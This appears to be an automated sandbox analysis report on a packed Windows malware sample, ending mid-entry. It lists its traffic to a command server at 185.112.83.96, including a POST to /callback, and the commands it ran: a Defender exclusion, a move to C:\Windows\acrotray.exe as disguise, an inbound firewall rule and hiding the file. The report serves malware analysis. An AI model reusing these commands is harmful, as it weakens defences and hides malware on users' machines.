Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6ed4f5f04d62b18d96b26d6db7c18840

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFE3E68Ah]
dec eax
lea edi, dword ptr [esi-0033C025h]
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007F9F20B1E955h
add ebx, ebx
je 00007F9F20B1E904h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007F9F20B1E923h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007F9F20B1E91Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007F9F20B1E8F1h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007F9F20B1E912h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007F9F20B1E8F2h
rep ret
cld
inc ecx
pop ebx
jmp 00007F9F20B1E90Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007F9F20B1E90Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007F9F20B1E8E8h
lea eax, dword ptr [ecx+01h]
jmp 00007F9F20B1E909h
dec eax
inc ecx
call ebx
adc eax, eax
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007F9F20B1E90Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007F9F20B1E8E6h
sub eax, 03h
jc 00007F9F20B1E91Bh
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi
xor eax, FFFFFFFFh
je 00007F9F20B1E95Ah
sar eax, 1

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4ff000	0x9c	UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x33c000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x33d000	0x1c2000	0x1c1c00	False	0.975809586055	data	7.86864211163	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
UPX2	0x4ff000	0x1000	0x200	False	0.1953125	data	1.37191358908	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 19:11:32.579027891 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:32.635747910 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:32.635886908 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.632904053 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.688898087 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:34.689019918 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.691591024 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:34.747591019 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:34.750452042 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:34.790941954 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:47.686625004 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:47.743113995 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:49.884005070 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:49.884129047 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.420911074 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.477381945 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:50.477534056 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.932284117 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:50.989042044 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:51.353740931 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:51.588341951 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:51.642314911 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:51.642400026 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:54.373760939 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:54.425156116 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:57.718404055 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:57.758157015 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:58.930190086 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:11:58.987181902 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:11:58.987879992 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:04.818032026 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:04.874435902 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:04.953682899 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:04.996277094 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:05.621375084 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:05.678320885 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:08.486728907 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:08.680119991 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:10.361368895 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:10.418006897 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:11.778111935 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:11.834145069 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:14.003263950 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:14.059753895 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:14.803855896 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:14.846776009 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:16.463815928 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:16.520467997 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:17.875608921 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:17.925992012 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:20.092966080 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:20.093099117 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:21.388849020 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:21.434753895 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:24.425477028 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:24.468317986 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:25.421443939 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:25.466538906 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:25.466624022 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:25.478267908 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:27.443866968 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:27.486454010 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:30.189610004 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:30.189863920 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:30.265495062 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:30.265763044 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:30.459825039 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:30.504183054 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.223900080 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.274924994 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.280040026 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:31.280154943 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:31.330987930 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:31.331149101 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:33.478296041 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:33.520126104 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:34.886312008 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:34.942558050 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:36.515907049 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:36.556416988 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:36.861457109 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:36.920067072 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:37.064465046 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:37.120906115 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:37.122276068 CET	49752	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:37.178709984 CET	60601	49752	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:39.542526007 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:39.583163977 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:42.552423954 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:42.594436884 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:45.195693970 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:45.252516031 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:45.903798103 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:45.955523968 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:48.963511944 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:49.021083117 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:49.841991901 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:49.842220068 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:49.842771053 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:49.842871904 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:50.044183969 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:50.044365883 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:50.839134932 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:50.839288950 CET	49762	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:50.894877911 CET	60601	49761	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:50.895006895 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:50.895518064 CET	60601	49762	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:50.895688057 CET	49762	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:51.094085932 CET	49757	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:51.094088078 CET	49753	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:51.151305914 CET	60601	49753	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:51.151355982 CET	60601	49757	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:52.906001091 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:52.946322918 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:53.212811947 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:53.269463062 CET	60601	49761	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:55.939783096 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:55.980508089 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:12:58.984086037 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:12:59.025790930 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:02.015341997 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:02.057162046 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:02.416490078 CET	49762	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:02.473051071 CET	60601	49762	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:04.765825033 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:04.823055983 CET	20000	49751	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:04.823144913 CET	49751	20000	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:04.844866991 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:04.900923967 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:05.058387995 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:05.110527039 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:08.286319017 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:08.341948986 CET	60601	49761	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:08.649507999 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:08.692653894 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:10.254456997 CET	60601	49761	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:10.254587889 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:10.255367994 CET	60601	49762	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:10.255482912 CET	49762	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:11.274796009 CET	49764	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:11.275356054 CET	49765	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:11.331226110 CET	60601	49764	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:11.331248999 CET	60601	49765	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:11.331394911 CET	49764	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:11.331430912 CET	49765	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:11.671916962 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:11.714335918 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:14.015362978 CET	49764	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:14.071747065 CET	60601	49764	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:14.317514896 CET	49765	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:14.377109051 CET	60601	49765	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:14.704138041 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:14.755925894 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:17.715574980 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:17.765957117 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:19.908477068 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:19.964482069 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:20.777015924 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:20.825982094 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:23.931657076 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:23.984023094 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:25.267054081 CET	49762	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:25.270431995 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:25.326044083 CET	60601	49762	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:25.326064110 CET	60601	49761	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:26.939796925 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:26.985981941 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:29.072695017 CET	60601	49765	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:29.072736025 CET	60601	49764	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:29.072849035 CET	49765	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:29.072937012 CET	49764	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:29.976320028 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:30.034569979 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:30.076354027 CET	49767	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:30.077234983 CET	49768	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:30.132801056 CET	60601	49768	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:30.132838011 CET	60601	49767	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:30.133034945 CET	49768	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:30.133066893 CET	49767	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:33.008883953 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:33.050292015 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:33.089128971 CET	49768	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:33.144635916 CET	60601	49768	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:33.444500923 CET	49767	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:33.501127005 CET	60601	49767	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:34.967093945 CET	49758	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:35.023262978 CET	60601	49758	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:36.038081884 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:36.079164982 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:39.066584110 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:39.108380079 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:40.328001976 CET	49762	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:40.329482079 CET	49761	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:40.384402990 CET	60601	49762	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:40.384907961 CET	60601	49761	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:42.121165991 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:42.163395882 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:44.089247942 CET	49764	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:44.089569092 CET	49765	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:44.145680904 CET	60601	49765	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:44.145721912 CET	60601	49764	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:45.153064966 CET	60601	49750	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:45.200545073 CET	49750	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:48.147315025 CET	49768	60601	192.168.2.3	185.112.83.96
Jan 14, 2022 19:13:48.153572083 CET	60601	49768	185.112.83.96	192.168.2.3
Jan 14, 2022 19:13:48.155612946 CET	49768	60601	192.168.2.3	185.112.83.96

HTTP Request Dependency Graph

185.112.83.96:20000

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49751	185.112.83.96	20000	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 19:11:34.691591024 CET	1129	OUT	POST /callback HTTP/1.1 Host: 185.112.83.96:20000 User-Agent: Go-http-client/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip Data Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56 Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV
Jan 14, 2022 19:11:34.750452042 CET	1129	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 18:11:34 GMT Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe PID: 4356 Parent PID: 4764

General

Start time:	19:11:30
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe"
Imagebase:	0x400000
File size:	1843200 bytes
MD5 hash:	8FB77EDBAE0C40E1E19D82A406B7615A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Start time:	19:11:31
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	19:11:32
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	19:11:33
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Start time:	19:11:35
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "ipconfig //flushdns"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:36
Start date:	14/01/2022
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig //flushdns
Imagebase:	0x7ff652f30000
File size:	34304 bytes
MD5 hash:	C7FAFF418EF7AD7ABDA10A5BCF9B53EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:39
Start date:	14/01/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +S +H C:\Windows\acrotray.exe
Imagebase:	0x7ff7e1670000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:40
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:41
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:43
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C ver
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:46
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic path win32_VideoController get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:48
Start date:	14/01/2022
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6746d0000
File size:	521728 bytes
MD5 hash:	EC80E603E0090B3AC3C1234C2BA43A0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Start time:	19:11:49
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Start time:	19:11:50
Start date:	14/01/2022
